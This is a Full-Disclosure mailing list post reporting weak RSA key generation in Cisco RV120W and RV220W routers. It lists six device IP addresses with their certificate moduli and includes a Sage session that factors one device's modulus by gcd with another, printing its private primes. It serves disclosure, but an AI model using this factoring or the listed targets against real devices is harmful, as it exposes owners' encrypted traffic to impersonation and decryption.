Cisco RVxxxW wireless routers weak RSA key generation

[Sławek Rozbicki <slawek () rozbicki eu>]

During the 83/8 subnet x509 research I've noticed that some of Cisco RVxxxW
devices share same primes in RSA modules. It is possible to regenerate
private key with ease using fast GCD (euklid based) operations on public
key pairs. Issuer field contains information about device type: Cisco
RV120W & RV220W.

---
83.3.225.142 /CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US

modulus1=DDE9C65105E787B41BCDE525321ABEE6023351DB29FF1482705FE5E817EA2B64E86FC88C33405F2B64CB505058258508C29C42A26310E37D17816C55272A3DF7356A2184D56C39ED44BD95F6CD2028EB53B19D9CA55D90258690C7382347D81594B4475EAA680E03AC006982FE5F9CD8A76FE3A0145B99B6F3F8AB6A1EFAA891
---
83.31.223.35 /CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US

modulus2=CB7520F6FECFD1D3D2AAB8B71AA56CEDA9041DE130EE857C1BC1C1E289E1DDF6DC4CFF2289F3510F6671281CC2AD4DEE4FA69808E9C73D56724F8BF6CF0419C3D386F042CAD4223A52F8F2B05AA47029135A74FD1356F1248B61F5F630FFA8BCAF7896FFC4777AFB795899FE29E298B66E59253D8255CD4F4C77E5F0DF1CF15D
---
83.64.13.157 /CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US
/CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US

modulus3=E84014187A1732FDCCDD093DC5C2493DE0B4039C0B2FB0E9BB1C18BE6AE13DF5FF1D2CEED3DF193619CA155FA2DFBCFE60D0FD5DA4BE0DC11F760F4E36569AA8A4AE48293E7C02B42FDA94FD9C864A30449B2FB203503E3F91BF1608FB94B71BE57ED130FC5328F0C7ADED7A78F805493AC5F05C3063F11B11DA5793F12FDDD5
---
83.115.0.102 /CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US

modulus4=B6A8683C4904F42909C6C0EDB62CC23AA303254F1BB212FD0B027635B701D48502C872919E057D00BA13DD761D5B85AAADC3F71B592EA6FBDB597B12062964E9C0008EF3C877E1CF42FA46B934A378E532563184F5DD85B82722753C67FC4686C7ACE38A299163E7E46C3CCD351F60F77058F8A4C130C5E1971D82CD69470137
---
83.183.190.88 /CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US

modulus5=E5DFFAD88132440471963BCD892F8F07CD81C59DDC48FB5EBA9DB81210C363186A71B6BC8DC4D2831E89164A186F32112E3D83D246D8F1F9BCB38FD68A9C5CDD90EE252B8E3E49C9A3DE1B94F623C617DDAE4F88C6EB357AB93DEE2A6A1DFE54789A05CFFCE238C60A517E8396A8AFFD049FA7AC49A74C113F8F2B8E916B749B
---
83.240.76.18 /CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US
/CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US

modulus6=D46F6539E22616F723B19CA0C5CF5D50C3261AE9E745DAA9E5E6FE97B32835BFAEE5521698859D780FBE0D5359C59C7D50ECBE225B6A3A54B8DAACF3ACD0E6D73870529976CA3381EB5C662AA906995D6B7B30E517F7A823418A0CC9EC5CD58FD29998918D1C1583E966A9E7949F6D39DBC6CA7DF26F9EC31AF9781882BA1FAD
---

Sage example:

sage: shared_prime = gcd(int(modulus1, 16), int (modulus5, 16))
p1 = shared_prime
q1 = int(modulus1, 16) / p1

p1, q1, p1*q1
(12499192433944213781964942843618609822425039145052853332296250924623852881553214592304077608523545660277486701486836494007466150831257304740197719090109033,
12467424348726819445887790699943735854402415241791247762494630183745045172659286153011191677004819818143512535707572760398177810526302338217312935436896233,
155832736090378128697871091112590904224554126152705026739669505216228645581087337554005500084035733074584019224807541210146848049519545937176568098670490593360508034088835934717657399028135252803788838857215199111453506414008787541666251986330567501515332545894446368462679367017260653321704576902679076972689)


-- 
Slawomir Rozbicki

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/